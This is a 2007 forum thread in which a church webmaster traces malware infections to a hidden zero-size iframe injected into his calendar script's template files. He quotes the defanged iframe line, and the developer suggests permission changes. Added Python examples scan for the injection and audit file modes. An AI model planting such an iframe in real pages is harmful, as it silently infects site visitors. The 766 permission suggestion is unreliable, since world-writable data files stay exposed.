Topic: Script hacked?
splainin2do2
« on: September 14, 2007, 09:53:16 PM »

I've had the Calendar running on our church site for a few years now, and love it.   Very easy for people to use to help enter event information without having to know a lot about computers.

Now that summer is over, we're having a lot of programs starting back up along with new ones. I went to make some changes, and when I opened the Admin login page, I got zapped with WinAntivirus 2007! I could watch pages and addresses blinking in the bottom of my browser, and recognized the symptoms of the infection as I've had to clean a few other folks' systems already (I do repairs in my spare time).

I cleaned my system out, and went to the calendar view page (that any visitor would see). I got zapped again!

Right now all links to the calendar have been removed from the church site until I can find out how to fix this. I *DO* have version 3.21 installed. I'm looking for info on the best way to go about fixing this problem. Any help, Dan O.?

P.S. - I used to be "splainin2do" here ages ago, but I can't seem to recover my password as all my e-mail addresses I've tried aren't found. I purchased our non-profit licence on 4/30/04 via PayPal.
DanO
Please don't PM me. Post in the open forum.
« Reply #1 on: September 15, 2007, 12:52:03 PM »

** I got zapped with WinAntivirus 2007! **

I'm afraid I have no personal knowledge of WinAntivirus 2007 so I have no idea how it operates.

** I *DO* have version 3.21 installed. **

Older CS versions had problems where other scripts could be uploaded to the server and run. It was not a problem with the script files themselves being affected.

** Any help, Dan O.? **

Not from me I'm afraid. Someone would need to look into the script and/or template file(s) and see what has been altered (if anything). Maybe compare a copy of the files on the server to a fresh backup or archived copy?

JMO

Dan O.


splainin2do2
« Reply #2 on: September 16, 2007, 12:07:33 AM »

Interesting...!

I checked the templates files and all the html files within the calendar and admin directories had been changed on 8/30/07!  I have not looked at them all, but the ones I did look at so far have the following line added after the closing </html> tag on each of them (note: I added the "***" 's inside that link to make DARN sure nothing bad would happen here!):


<html><iframe width=0 height=0 frameborder=0 src=hxxp: www. free20. com***/portal/index. php?aff=razec marginwidth=0 marginheight=0 vspace=0 hspace=0 allowtransparency=true scrolling=no></iframe></html>


I know *I* didn't do that... and the log files on the server only go back to 9/1 right now.

I replaced those files with the ones I had on my system and everything seems fine now, so far.

I'm going to have to do some checking on this... thanks for pointing me in the right direction!

Splainin2do
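
One way to run the comparison suggested in Reply #1 and to look for the change reported in Reply #2, as an added example that is not part of the original thread: it flags HTML files that carry content after the first closing `</html>` tag, contain a zero-size iframe, or differ from a clean copy. The directory layout, function names and sample strings are assumptions made for illustration.

```python
import hashlib
import re
from pathlib import Path

# Constructed samples; example.invalid is a placeholder, not the URL from the thread.
SAMPLE_CLEAN = "<html><body>Calendar</body></html>\n"
SAMPLE_INJECTED = (SAMPLE_CLEAN + "<html><iframe width=0 height=0 frameborder=0 "
                   "src=http://example.invalid/ scrolling=no></iframe></html>\n")

CLOSE_HTML = re.compile(r"</html\s*>", re.IGNORECASE)
HIDDEN_IFRAME = re.compile(
    r"<iframe\b[^>]*\b(?:width|height)\s*=\s*[\"']?0\b[^>]*>", re.IGNORECASE)


def trailing_markup(text):
    """Return non-whitespace content after the FIRST closing </html> tag.

    The first tag matters: the appended block carries its own </html>,
    so measuring from the last one would report nothing.
    """
    m = CLOSE_HTML.search(text)
    return text[m.end():].strip() if m else ""


def inspect_file(path, clean_copy):
    """List findings for one live file, compared with its clean copy."""
    raw = Path(path).read_bytes()
    text = raw.decode("utf-8", errors="replace")
    findings = []
    if trailing_markup(text):
        findings.append("content after </html>")
    if HIDDEN_IFRAME.search(text):
        findings.append("zero-size iframe")
    clean = Path(clean_copy)
    if not clean.is_file():
        findings.append("no clean copy")
    elif hashlib.sha256(raw).digest() != hashlib.sha256(clean.read_bytes()).digest():
        findings.append("differs from clean copy")
    return findings


def scan_tree(live_dir, clean_dir, patterns=("*.html", "*.htm")):
    """Map relative path -> findings for every flagged file under live_dir."""
    report = {}
    for pattern in patterns:
        for f in sorted(Path(live_dir).rglob(pattern)):
            rel = f.relative_to(live_dir)
            found = inspect_file(f, Path(clean_dir) / rel)
            if found:
                report[str(rel)] = found
    return report
```

Run `scan_tree` with a downloaded copy of the server's calendar and admin directories as `live_dir` and the original distribution or a backup as `clean_dir`; files reported as "no clean copy" were not in the backup and need a manual look.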
DanO
« Reply #3 on: September 16, 2007, 01:13:56 AM »

** I'm going to have to do some checking on this **

You definitely should.

** the log files on the server only go back to 9/1 right now. **

Your host might have older ones.

BTW. What permissions do you have the templates' directories set to?

Dan O.
DanO
« Reply #4 on: September 16, 2007, 01:19:49 AM »

PS. It looks like the hacker has been busy:

ww.google.com/search?num=100&q=aff%3Drazec

JFYI

Dan O.
splainin2do2
« Reply #5 on: September 16, 2007, 08:05:51 AM »

Yes, I read more on that after my post.   

I've changed the permissions for my templates directory (along with all files within) to 755.   My understanding is that users can still view and upload information to the calendars (I tried that to be sure), but now unless they FTP in directly to my server there is no way for them to alter the files themselves to re-insert this hack?

Does this make sense, or am I misunderstanding how file permissions work?
DanO
« Reply #6 on: September 16, 2007, 04:52:12 PM »

Actually, at most the data files should only need 766 (read/write for the world - not execute) but I doubt even that is needed. When the script accesses those files, the permissions you set are pretty much irrelevant (depending on server set up). Try 700, which won't allow anyone to even directly view those files from a browser... except by running the script.

JMO

Dan O.
« Last Edit: September 16, 2007, 09:17:42 PM by DanO »
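
What the three modes mentioned in this thread (755, 766, 700) grant, as an added example that is not part of the original posts: it decodes permission bits for a directory tree and lists the paths that accounts other than the owner can write to. Function names are illustrative, and whether the web server runs as the file owner depends on the host.

```python
import os
import stat


def describe(mode):
    """Decode permission bits: octal, rwx string, and who else can write/read."""
    bits = stat.S_IMODE(mode)
    return {
        "octal": format(bits, "03o"),
        "rwx": stat.filemode(mode)[1:],
        "group_write": bool(bits & stat.S_IWGRP),
        "world_write": bool(bits & stat.S_IWOTH),
        "world_read": bool(bits & stat.S_IROTH),
    }


def audit_tree(root):
    """Return {relative_path: description} for root and everything below it.

    Directories are included: write access to a directory lets an account
    replace or add files in it whatever the modes of the files themselves.
    """
    report = {".": describe(os.lstat(root).st_mode)}
    for dirpath, dirnames, filenames in os.walk(root):
        for name in dirnames + filenames:
            full = os.path.join(dirpath, name)
            st = os.lstat(full)
            if stat.S_ISLNK(st.st_mode):
                continue  # symlink modes are not meaningful on Linux
            report[os.path.relpath(full, root)] = describe(st.st_mode)
    return report


def writable_by_others(report):
    """Paths that accounts other than the owner can modify."""
    return sorted(p for p, d in report.items()
                  if d["group_write"] or d["world_write"])
```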